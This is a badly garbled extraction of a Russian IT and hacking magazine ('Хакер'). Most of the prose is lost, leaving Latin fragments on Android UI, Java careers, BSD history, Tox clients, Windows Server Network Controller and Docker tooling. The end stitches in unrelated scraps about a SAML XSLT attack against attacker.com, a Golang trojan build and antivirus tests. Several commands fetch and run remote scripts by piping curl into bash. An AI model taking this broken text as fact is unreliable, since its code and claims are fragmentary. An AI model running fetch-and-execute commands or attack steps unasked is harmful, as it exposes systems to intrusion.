GitHub,
. 10. Navigation Drawer
NESTED TOOLBAR
(CardView), Card Toolbar ( Nested Toolbar), , Toolbar. . 8 . .
NAVIGATION DRAWER
Navigation Drawer , (. 10).
: , , , .
, Navigation Drawer,
DrawerLayout , GUI (Toolbar, ), NavigationView. : headerLayout

menu. , , ( layout), , , ( menu).
(
Google, ). ,
colorPrimaryDark ( ?):
,
(),
checkableBehavior="single". , title="@string/nav_sub_
menu".
(, )
:
onOptionsItemSelected, :
NavigationView
onNavigationItemSelected, , -,
setChecked(true); -, Navigation Drawer; -,
, (Toast).
SWIPEREFRESHLAYOUT,
,
...
,
SwipeRefreshLayout. , ,
, , .
,
.
. 12. ?
MATERIAL DESIGN ANDROID

.
TABLAYOUT
(Tabs). CoordinatorLayout Toolbar :
TabLayout, ViewPager ,
(. 11).
. 11.
onCreate, , :
, Tab.
(TextView) , .
mFragmentList, , mFragmentTitleList,
TabLayout. , ,
TabFragment :
NewInstance ( ) (putString) (title). onCreateView .

Material Design, ,
GUI. Google, , , .
...
, ?
Droidcon 2015 , Material Design,
, , , -- SDK. Google
, ,
(. 13), , 8 dp, 10 dp. , , 8 dp?
? ? , , 16 dp?
: Action , ? ? ?
, , Material
Design , .
. 13. ?
, ,
, . , Google () . , ,
Material Design ,
(: ) Holo-
Material . , ...
gogaworm
gogaworm@tut.by

JAVA-!
Java-
IT. ,
,
.
, , Java-, .
Java- .
.
Java-, .
,
.
, , . ,
, , , -, unit-, -, ,
Jenkins . ,
, ,
, .

.
Core Java. Java
, Java Oracle, OCA OCP
Java SE 7 Programmer I & II Study Guide. , .
, YouTube.
Golovach Courses. Java Core, JDBC, JEE , ,
. , Java-,
IT Sphere Channel.

, Java Enterprise .
Enterprise Java , JSP. , . Head First Servlets
and JSP OReilly.
JSP-, , -, MVC J2EE.
,
.
Java Enterprise Tomcat. , , , . Tomcat .
-, ,
, SSL.
JBoss/WildFly - J2EE- . JBoss/WildFly , , .
- ? , , , NoSQL-, SQL. SQL .
Java, , , JOIN . SQL SQL
. w3schools.
JDBC. , ,
? , ORM JDBC,
. ,
ORM JDBC ,
.
ORM Hibernate. . , Hibernate
. Java Persistence with Hibernate
.
- ( ) Spring. Spring, , .
. , ,
Spring 4 , .
Spring , , , , , Spring , Hibernate.
Dependency Injection / Inversion Of Control,
, container, , ,
scopes, XML-, , , , , Spring MVC.
Dependency Injection /
Inversion Of Control, , container,
, , scopes, XML, , ,
, , Spring MVC
-,
REST SOAP. .
XML ( Enterprise), XPath JSON.
, -. HTML, CSS
JavaScript? , . HTML
w3schools, CSS , , . JavaScript. jQuery AngularJS.
(, .
. .).
, Java Java. , Topcoder Codeforces.
, . , , , , ,
:). . , , , .
,
. , . , .
, , - -, , IDEA ( ) . , Hibernet,
, , -,
, .
, .
. , ,
, , , ,
. , ,
, .
.
, , ,
. , , , , .
, .
, , .
, ,
, , ,
. ,
, .
: . ,
, ,
.
, ( ).
. , , , ,
, , , .
, , - ,
.
. , , . .
-
. , , ,
,
- .
. , , .
? ,
.
, ,
, . . .
, ,
/ .
, . .
open source . , , . ,
.
( ). ,
.
, , ,
. , 90%- .
- - , , , . , , , ,
. , .

.
. .
, , , ,
. , -.
, , .
.
, , .
, .
,
, ,
. , ,
, - , - ()
,
, , , .

, . , , .

. - ,
. , , .
.
- , ,
. , ,
, , - .
, , ,
. ,

. , , .
, .
IT-, !
- , , . lozovsky@glc.ru
. , , .
, , ,
.

, , ,
.
,
, , Java ,
. , Java-, Joker JPoint. , Spring,
, . , , / ,

. ? ! ,
, .
WWW

IT

UNIXOID
BSD
1.
BERKELEY
SOFTWARE DISTRIBUTION

zobnin@gmail.com
Linux FreeBSD,
BSD-. , , . ,
BSD.
, BSD
,
.

BSD. BSD ,
. NetBSD
BSD, ,
( Linux, ).
OpenBSD, , , , , . , DragonFly
HAMMER.
, BSD
, . BSD -
, , , .
-,
, ,
Sun, ,
Alphabet Inc. (Google), vi, API TCP/IP-, , . ,
, .
: 1BSD, 2BSD
-, - Bell Labs
Space Travel.
, PDP-7 , - ,
. UNICS
( CS X)
. 1969 , 1971- Bell Labs
.

BSD, ,
1973 UNIX
( )

. , UNIX (
FUN FACT
), . , , , , , 1977
UNIX

BSD.
B,
,
1BSD ,
.
Berkeley

UNIX Software Tape: Pascal ( 1975 C++
D.
), ex, UNIX- ashell, Star
Trek . ,
man- .
, , ,
. , UNIX ,
, - .
, 30 1BSD , 35 50 (, , ).
1BSD . ,

BSD.
Open Source.

2BSD, 1979-. , 2BSD
FUN FACT
,
BSD-
vi
hjkl
csh - vi
( ). Berknet,
,
, , ,
,

ARPANET. ,

.
.
1BSD
1,2 3,4 .
ar ( , .a) ,
READ_ME (, !).
READ_ME troff (man-) , BSD
. This will require
about 10 000 blocks of storage... _.P_.a_.s_.c_.a_.l (
wow).
:
Berkeley UNIX Software Tape
Jan 16, 1978 TP 800BPI
To extract contents do:
tp xm ./setup; sh setup; tp xm
, ,
UNIX:
The contents of this tape are
distributed to UNIX licensees
only, subject to the software
agreement you have with Western
Electric and an agreement with
the University of California.
DEC
VT100

: 3BSD 4.1BSD
1978 VAX-11, BSD Software
Distribution .
: UNIX VMS UNIX VAX. ,
.
-
VAX-11

FUN FACT
BSD
VAX

/vmunix,

Virtual Memory Unix.

/boot
Linux,
,

. ,
vmlinux
vmlinuz, z
zip (, gzip),
.
, , .
3BSD, UNIX,
UNIX- , , 2BSD. 1979 ,
DARPA. -, (Computer Systems Research Group CSRG)
.
DARPA ,
4BSD ( 1980-), ( 1981-)
4.1BSD. - 5BSD, AT&T ( Bell Labs),
UNIX System V ( UNIX BSD ,
UNIX ,
BSD , ).
4BSD : sendmail delivermail (, FTP-),
csh ( <Ctrl + Z> fg jobs) curses . , ncurses (new curses),
, top, mc, mutt,
.
BSD VAX11, VMS. , -
VMS. , VMS. 4.1BSD.
, 2BSD,
2.9 , UNIX V7.

BSD, 17 2012 ( , 2012 PDP-11).
: 4.2BSD 4.3BSD
4.2 ( 1983-) BSD , .
TCP/IP API , . , TCP/IP , BBN (
4.1a), , Windows 95.
TCP/IP- BSD- ( ,
) .
4.2BSD FFS (Fast File
System), FFS, UFS1 UFS2
BSD-. UNIX FFS Bell Labs, Solaris.
ext2,
Linux- ext3/4, ,
UFS1. 4.4BSD , (soft updates,
) , , -,
FreeBSD.
4.2 BSD, ,
Sun Microsystems. -
. :
. , , ,
Pixar.
4.3BSD,
, ,
,
Power 6/32. ,
,
BSD
. BSD BSD
.
BSD UNIX,
AT&T, , . BSD Net/1. ,
, .
Net/2 ,
AT&T. .
, 4.4BSD LINUX
, Net/2
1991 . Open Source: ,
( BSD :
, , ). Net/2
386BSD, , , x86.
, BSD ,

(CSRG, DARPA, ).
BSDi (Berkeley Software Design, Inc.) BSD x86 (BSD/386, 386BSD,
). ,
UNIX: 995 20 000.
. AT&T, (, BSD, AT&T), BSD UNIX,
. : 1) BSD AT&T, 2) BSDi UNIX
( - 1-800-ITS-UNIX,
BSD/386). BSDi , ,
BSD Net/2
: AT&T BSD, .
, , BSD
, Linux
. , , : - 1993 BSD
AT&T . , BSD
Linux , BSD .
BSD . BSD Net/2 x86 ( 386BSD),
1993 : NetBSD FreeBSD,
NetBSD OpenBSD, FreeBSD DragonFly.
1994 4.4BSD Lite,
NetBSD FreeBSD.

4.4BSD Lite
BSD ,

Linux. , , BSD
Android, Microsoft OpenBSD, NetBSD
, Linux, - DragonFly BSD. , , , Linux.
UNIX BSD
UNIXOID
IM
TOX LINUX
,
temazorin@hotmail.com
Tox (
2013 ) ,
,
Skype VoIP-. , Skype 2011
.
Skype, Tox : , , , ,
.
.

, , - . , . , , Tox
. UDP. , .
(
), . . Tox
, , , BitTorrent Sync.

. , , ,
. .
ID . Linux
~/.config/tox. Tox INFO
GPLv3.

4chan.
IM
Tox
, ,
, - -.
.
. . ,

. Tox GitHub, . - SOCKS. , ,
Tor. NaCl ( salt, ),
(Daniel J. Bernstein) .
Tox . . , Briar, (Michael Rogers) , Invisible.im,
(Patrick Gray) Metasploit.
WhatsApp, Viber .
.
Signal iPhone Silent Circle
Android. Tox , . Tox
,
(David Lohle) Wired.
, .
Tox

WWW

Tox -
Tox
Tox
Linux. Tox Linux , . Tox Ubuntu 15.10 Mate.
TOX
2015 Tox Tox
Foundation, . , ( Stqism,
AlexStraunoff NikolaiToryzin), Tox Foundation, . , . ,
. ,
Tox Google Summer of Code 2014, - .
tox.chat.
, , . ,
. . .
14 2015 , , .
,
.
UTOX
, uTox, Tox,
. Linux - 0.5.0. ,
Ubuntu uTox : . uTox .
Ubuntu Debian.
/etc/apt/sources.list
Tox, uTox APT. , , $CODENAME release. Ubuntu ( 14.04), Debian:
$

$

$
$
echo "deb https://pkg.tox.chat/debian nightly $CODENAME" |

sudo tee /etc/apt/sources.list.d/tox.list
wget -qO - https://pkg.tox.chat/debian/pkg.gpg.key |
sudo apt-key add sudo apt-get install apt-transport-https
sudo apt-get update
uTox Gentoo Arch Linux.

uTox .
. uTox .
Tox, . TOX ID. 76- .
, .
TOX ID, , . -
:
42E9CA1A838AB6CA8E825A7C48B90BAFE1E22B
9FA467A7AD4BA2821F1344803BD71BCB00A535
ID.
uTox. TOX
ID, nickname@utox.org.
uTox
. uTox Skype,
. . , -
. -, uTox .
( ) . .
SIP. - , -. Skype . ,
Skype Tox . , . -
. (350 ) .
150 .
uTox .
, . ,
uTox, . , . . , uTox
. Skype.
uTox
: 7 ;
: 10 ;
: 6 ;
: 5 .
QTOX
Tox qTox. ++
Qt 5.
1.2. , uTox. ,
uTox, qTox.
qTox 1372 . - , (, ).
. Skype.
qTox . , Tox
Linux. uTox.
.
: qTox . ,
. , , , uTox,
. ,
.
.
! Tox ,
. , , , uTox, qTox. . , , .
qTox Tox. , KDE.
: 9 ;
: 10 ;
: 7 ;
c: 9 .
TOXIC
Tox . . Toxic
ncurses Linux FreeBSD. , ,
2013 , Tox.
Tox, qTox uTox. Toxic . BSD- . Toxic
( ). toxic,
toxic help. ./config/tox/toxic.conf. Toxic.

.
, SOCKS5 HTTP-, , , . , - . Toxic uTox qTox,
, .
Toxic
: 4 ;
: 6 ;
: 4 ;
c: 9 .
XWINTOX
XwinTox Tox,
Linux, BSD-, Solaris FreeBSD.
Linux . ++,
FLTK.
, XwinTox Tox. , -

Tox. Linux XwinTox
, uTox. . , 150 . Linux,
, . , FLTK.
, uTox, GTK+
Qt, FLTK. , Tox (, Linux , OS X Windows) uTox. .
, - . . Tox,
XwinTox. XwinTox , Solaris BSD-.
XwinTox
Linux
WARNING

Tox ~/.config/tox!

Tox!
: 9 ;
: 8 ;
: 7 ;
: 3 .
WINDOWS
Tox
Windows. Tox. .
Antox Tox Android. -.
, .
- . Antox
Google Play Beta, Google
,
F-Droid. , .
iOS. Antidote Tox iOS. , . .
. , , .
Tox .
Isotoxin Tox Windows, Rotkaermota. ++.
Isotoxin , . Tox,
. ( , : , Tox,
), (, , Tox ID), , , - , ,
, , ,
. , .
Isotoxin

Skype Microsoft, , , Tox.

Tox - . , . Tox ,
, . Tox Linux. ,
, . ,
Tox, .
. , , Tox , Linux. , , qTox. ,
.
, Tox - . Tox. .
, Tox. Tox
. , .
SYNACK

WINDOWS SERVER 2016
urban.prankster
martin@synack.ru
, ,
, ,
. ,
.
. Windows Server 2016
Network Controller, (Software Defined Networking).
NETWORK CONTROLLER
Network Controller Win 2016, Azure, , IP-, VLAN,
Hyper-V-.
Network Controller,
Hyper-V, , , , VPN-, RRAS, .
Border Gateway Protocol (BGP).
,
VM.
MS NVGRE (Network Virtualization using Generic Routing Encapsulation,
Win 2012), VXLAN (Virtual Extensible LAN VMware, Arista
Networks, Cisco...). , , , , Windows Server.
Network Controller API:
Southbound API. , .
, ;
Northbound API. REST-.
PowerShell, API
REST System Center 2016 Virtual Machine Manager (SCVMM 2016) System
Center 2016 Operations Manager (SCOM 2016).
.
, SNMP ,
, , .
Microsoft Message Analyzer, Microsoft Network Monitor,
, , , ,
, .
SNMP-, .
, . , ,
VM, . Data
Center Bridging, IEEE 802.1.
NETWORK CONTROLLER
Network Controller , .
Kerberos, . .
. Network Controller
, . Network Controller
, Win 8/8.1/10.
Network Controller , DNS DNS ,
Dynamic updates Secure only.
Primary Active Directory-integrated.
Security f Advanced ( f ). .
, , ,
Subject . DNS. /
. ,
, .
IIS.
Network Controller ( ) ,
PowerShell. :
PS> Install-WindowsFeature -Name NetworkController
IncludeManagementTools
Network
Controller, . , , PowerShell, SCVMM 2016 SCOM 2016, . , PowerShell.
NetworkController 45 .

PS> Get-Command -module NetworkController
, , , . , MS Network Controller
PowerShell , , . , .
NetworkController
() Network Controller, , . ,
NetworkController.
NETWORK CONTROLLER

New-NetworkControllerNodeObject, . , REST-
( Get-NetIPConfiguration, ), (FaultDomain).
, Azure,
NetworkController . .
NodeCertificate.
PS> $NodeObject = New-NetworkControllerNodeObject -Name "Node1"

-Server "example.org" -RestInterface "Ethernet0"

-FaultDomain "fd0:/rack1/host1"
NetworkController.
.
( Active Directory Kerberos, x509 None).
,
NetworkController, , SSL , , .
PS>

Install-NetworkControllerCluster -Node $NodeObject

-ClusterAuthentication "Kerberos"
-ManagementSecurityGroup Example\NCAdmins
-LogLocation "\\example.org\nc"
GetNetworkControllerCluster. . Install-NetworkController
,
. Get-ChildItem Get-Item. , .
PS> $Certificate = Get-Item Cert:\LocalMachine | Get-ChildItem |

where {$_.Subject -imatch "example.org" }
PS> Install-NetworkController -Node $NodeObject

-ClientAuthentication "Kerberos" -ServerCertificate $Certificate
-EnableAllLogs
. , , Get-NetworkController. SetNetworkController.
,
,
. . : ( ) SNMP
. URI, .
PS> $cred = New-Object Microsoft.Windows.NetworkController.
CredentialProperties
PS> $cred.type = "usernamepassword"
PS> $cred.username = "domain\admin"
PS> $cred.value = "passwd"
SNMP $cred.type
PS> $cred.type = "snmpCommunityString"
. :
PS> New-NetworkControllerCredential -ConnectionUri

"https://example.org" -Properties $red ResourceId "Cred1"
, SNMP Properties ResourceId.

:
PS> Get-NetworkControllerCredential -ConnectionUri

"https://example.org" -ResourceId Cred1
. , . .
PS> $config = New-Object Microsoft.Windows.Networkcontroller.

ConfigurationProperties
PS> $config.DiscoverHosts = "true"
1440 , , :
PS> $config.DiscoveryIntervalInMinutes = "10"
, :
PS> $config.DiscoveryScopes = "10.0.0.0/24,192.168.0.0/24"
, . , ,
.
PS> $credential = Get-NetworkControllerCredential

ConnectionUri https://example.org ResourceId red1
PS> $config.Credentials = $credential
IP- ,
:
PS> $config.DiscoverySeedDevices = "192.168.0.1"
:
PS> $config.HopLimit = "3"
PS> $config.ActiveDirectoryDomains = "example.org"
:
PS> Set-NetworkControllerTopologyConfiguration

ConnectionUri https://example.org Properties $config
:
PS> $topology = Get-NetworkControllerDiscoveredTopology

-ConnectionUri https://example.org
PS> $topology.Properties
:
PS> $discovery = New-Object Microsoft.Windows.NetworkController.
NetworkDiscoveryActionProperties
PS> $discovery.Action = "start"
PS> Invoke-NetworkControllerTopologyDiscovery

ConnectionUri https://example.org Properties $disovery
, . , , , , . Windows
DCB, :
PS> Install-WindowsFeature Data-Center-Bridging
, Microsoft LLDP Protocol Driver QoS Packet Scheduler.

:
PS> Enable-NetAdapterQoS "Ethernet0"
DCB Get-NetQoSDCBxSetting.

Get-NetworkControllerTopologyDiscoveryStatistics:
PS> Get-NetworkControllerTopologyDiscoveryStatistics

, :
PS> $topology = Get-NetworkControllerDiscoveredTopology

.
PS> $topology.Properties
:
PS> $topology.Properties.TopologyNodes[0].Properties
:
PS> $topology.Properties.TopologyLinks[0].Properties
, : Get-NetworkControllerDiscoveredTopologyLink, Get-NetworkControllerDiscover
edTopologyNode Get-NetworkControllerDiscoveredTopologyTerminationPoint.
,
, , . . ,
. NetworkControllerDiscoveredTopology
New- Remove-.
IP- New-NetworkController
LogicalNetwork, New-NetworkControllerLogicalSubnet New-NetworkControllerIpPool.
.
, . PowerShell
, , .
SYNACK

DOCKER
urban.prankster
martin@synack.ru
, Docker
IT-,
. , , , .
, ,
.
- : - .
: . Docker -
, , , .
, ,
. .
Docker , CPU, Mem, I/O .
: sysfs (
/sys/fs/cgroup), stat API.
$ cat /sys/fs/cgroup/cpuacct/docker/CONTAINER_ID/cpuacct.stat
$ docker stats CONTAINER_ID
API , .
$ echo -e "GET /containers/[CONTAINER_ID]/stats HTTP/1.0\r\n" |

nc -U /var/run/docker.sock
, stdout/stderr Docker .
Ubuntu /var/lib/docker.log.

, ,
. . API .
, cAdvisor, , , . cAdvisor,
. . ,
, . .

. , , . cAdvisor InfluxDB
Google BigQuery. InfluxDB -storage_driver=influxdb.
cAdvisor Docker,
( Docker).
$ docker run --volume=/:/rootfs:ro --volume=/var/run:/var/run:rw
--volume=/sys:/sys:ro
--volume=/var/lib/docker/:/var/lib/docker:ro

--publish=8080:8080 --detach=true

--name=cadvisor google/cadvisor
, , http://localhost:8080. , cAdvisor Docker.

Docker.
Axibase Time-Series Database , , cAdvisor ( ),
, . ATSD Docker cAdvisor.
TCP, , --atsd_storage_url
--atsd_storage_write_host. ATSD
collectd, tcollector Nmon, .
.
open source
Prometheus, . Docker .
Zabbix, , .
cAdvisor
, . Docker, ,
: , .
STDOUT,
docker logs -f <_>.
, STDOUT .
. , ,
-t STDOUT TTY.
. --log-driver
docker run, syslog, journald,
fluentd, JSON .
$ docker run ubuntu --log-driver=syslog

--log-opt syslog-address=udp://192.168.0.1:514

--log-opt labels=ubuntu
, syslog, . , .
. , {{.Name}} , {{.ID}} .
, -v /var/
log/:/var/log/, . .
, .
logspout (STDOUT, STDERR syslog)
.
$ docker run name="logspout"

--volume=/var/run/docker.sock:/tmp/docker.sock

gliderlabs/logspout syslog://example.org:514
. , httpstream . , ,
-e 'LOGSPOUT=ignore'.
Logjam UDP- . Docker
logstash , ,
, .
, .
GUI Docker Kitematic, OS X 10.9+ Windows 7+ 64-bit, , Docker,
( VirtualBox). .
,
. Docker Remote
API, ,
. Shipyard, ,
Docker. , , , , (, , , ,
), . CPU, , .
, IP.
docker exec. , OpenLDAP Active Directory. , .
, . RethinkDB. Docker Swarm, Docker-
. :
$ curl -sSL https://shipyard-project.com/deploy | ACTION=deploy bash -s
,
Swarm, . 8080 , / admin/shipyard. (
LDAP, RethinkDB, )
$ docker run shipyard/shipyard server -h
Shipyard
, Dockerding, , (ID, , , , , ), ,
, , , , .
, . . ,
, .
$ docker pull evolutio/dockerding
$ docker run -d -p 3000:3000 --privileged --name dockerding

-v /var/run/docker.sock:/var/run/docker.sock evolutio/dockerding
http://localhost:3000 .
Dockerding

,
. Docker
Docker Registry,
.
Docker Registry UI - Docker Registry, , ,
, .
. H2, H2.
. Docker Registry.
$ sudo docker run -p 5000:5000 registry
, URL ( localhost ),

-.
$ sudo docker run -p 8080:8080 -e REG1=http://example.org:5000/v1/
atcol/docker-registry-ui
http://example.org:8080.
Registeres, Ping succeeded. Images ,
. -e READ_ONLY=true
.
Docker Registry UI
, , Portus, . (teams).
, (namespaces), . namespaces
, .
namespaces : Viewers ( ), Contributors ( ) Owners ( ). . , ( ),
. LDAP.

. , .
Git Dockerfile . Captain . .
.
Zodiac , Docker Compose, .
. docker-compose.yml
zodiac deploy. docker-compose.yml . zodiac list . , zodiac rollback
_.
Rocker-compose , Docker
Compose, ,
. , . , . (Docker Compose
). , ,
. ( ENV).
BASEIMAGE-DOCKER
Docker ,
. Docker Docker Hub, , . ,
, , .
. , Baseimage-docker, phusion/baseimage. PID 1, - , Linux . Docker
Linux init- ,
Linux. Docker , CMD.
-,
SIGTERM , . (, ) , , , -
. Baseimage-docker
/sbin/my_init, .
. Docker , .
, .
. ,
,
. syslog, crond , UNIX- , . SSH, docker exec Docker 1.4
. Baseimage-docker runit, .
setuser .
Baseimage-docker
, Docker. , , , , Docker-,
.
FAQ
Zemond
3em0nd@gmail.com
FAQ

( ? FAQ@GLC.RU)

WINDOWS
, ,
, . , Windows. , ,
.
, Performance Monitor, . , , , ,
, ( Server 2012),
Administrative tools. , ,
perfmon.msc.
- . , , - , .
, . :
Memory f Pages/sec
Processor [_Total] f %Processor Time
System f Processor Queue Length
Physical Disk f Avg. Disk Queue Length
Network Interface f Bytes Total / sec
. .
Performance Monitor.
, . , ,
, . , .
, , ,
:
Memory
Pages/sec
: 0.
:
20
Processor[_Total]
% Processor
Time
70%

System
Processor
Queue Length
2*
Physical Disk
Avg. Disk
Queue Length
2* ,
Network Interface
Bytes Total /
sec
65%
, , .

-, ,
, .
, , ,
.
. HP,
ScanToPdf .
, , . ?
, , .
, . ! , ,
ScanToPdf , . ,
Sysinternals. Process Explorer ,
. ScanToPdf, DLL, twain.log. :
C:\Users\%username%\AppData\Local\Temp\twain.log
, , .
. .
twain.log , . , .

.NET FRAMEWORK
NET Framework 3.5 0x80070643, .
.
1. MSI.
2. .NET Framework.
3. .NET Framework.
. Fix it, Microsoft.

(
).
. wuapp . .
, . .
, .
. , , . .

WINDOWS XP RDP
Windows XP RDP :
, .
.
RDP
:
1. , Windows XP service pack 3.
2. RDP .
3. .
, , , , . .
, . , Windows Server 2008 Server Authentication.
, .
.
regedit . .
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
Security Packages tspkg.
tspkg Security Packages
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]
SecurityProviders credssp.dll.
credssp.dll SecurityProviders
18+
2 (205)

rusanen@glc.ru

glazkov@glc.ru

-
pismenny@glc.ru

PC ZONE, , UNITS
pismenny@glc.ru
ant
zhukov@glc.ru
goltsev@glc.ru

X-MOBILE
zobnin@glc.ru
rusanen@glc.ru

UNIXOID SYN/ACK
kruglov@glc.ru
Dr.
MALWARE, ,
PHREAKING
lozovsky@glc.ru
MEGANEWS


PR-
yakovleva.a@glc.ru

samsonenko@glc.ru

shop.glc.ru, info@glc.ru

(lapina@glc.ru)
: , 109147, / 50
: claim@glc.ru. : 115280, , . , .19, . : : 606400, ., -, . , ., .13. : , 614111,

, . , . , . 26. , (), 77-56756 29.01.2014 . . . , ,
. . : xakep@glc.ru. , , 2015

Хакер

Загружено:

Сведения о документе

Описание:

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Описание:

Авторское право:

Доступные форматы

Хакер

Загружено:

Описание:

Авторское право:

Доступные форматы

2016

Microsoft Windows 10: Windows 7 8.1

SSO. X.509 certificate, Issuer URL,

IdP. Users f All

, email . Applications (. 8).

. 10. URL decoding

. 11. Base64 decoding

SAML Response IdP, Base64 Decode + Inflate Base64 Decode.

SAML Raider. Java, ,

. 13. SAML Raider tab

SAML Raider Certificates, , assertions SAML-.

. 14. SAML Raider Certificates tab

SINGLE SIGN-ON SAML

enveloped signature, 14N 14N11 , XPath XSLT .

attacker.com GET-, , XSLT.

SAML Response. <samlp:Extensions>,

, , SAML SSO. , SSO SAML , SAML SSO.

Hello World MNIST, 60 ,

, Remix Mini -. Jide Technology

Remix OS Google, Play Store.

SSL Server Test SecurityHeaders.io

Popcorn Time, . Netflix

Open Mic+ for Google Now

Commandr for Google Now

Samsung Galaxy Camera

Nikon Coolpix S800c

Android Android TV.

Dacor. -. Samsung SSPV210 1 , Cortex

Android Wear Android

GreenDog , Digital Security

RCE SAML XSLT

phpBB < 3.1.7-PL1.

Ubuntu 14.04, , kASLR

The Anatomy of a Rails

Ruby on Rails 25 2016 .

Hash Manager, Bonus, 30

Nmap , , , . Nmap postgresql, Hydra

, str. io.popen(str). str

$ sudo apt-get install postgresql

$ sudo service postgresql status

$ sudo service postgresql start

INSIDEPRO HASH VERIFIER

INSIDEPRO HASH FINDER

INSIDEPRO HASH MANAGER

GOLANG ADVANCED TROJAN

go build -o GoAT.exe -ldflags

Opppa... Gangnam style

Kaspersky Free MS SmartScreen

Kaspersky VirusTotal Downloader.Win32.Bundl.

Avira 1329 , \Program Files\Avira\. \ProgramData\Avira . Avira Free

Kaspersky Free, Avira SmartScreen.

AVG ANTIVIRUS FREE EDITION

AVG Free AVG SafeGuard by Ask Ask ,

AVAST! FREE ANTIVIRUS (11.1.2245)

, VirusTotal 34 , Avast! . , MSS.

code review printf, console.log?

git push --force

printf shall not pass

git diff --cached --name-only , ,

hook IntelliJ IDEA

commit message GitLab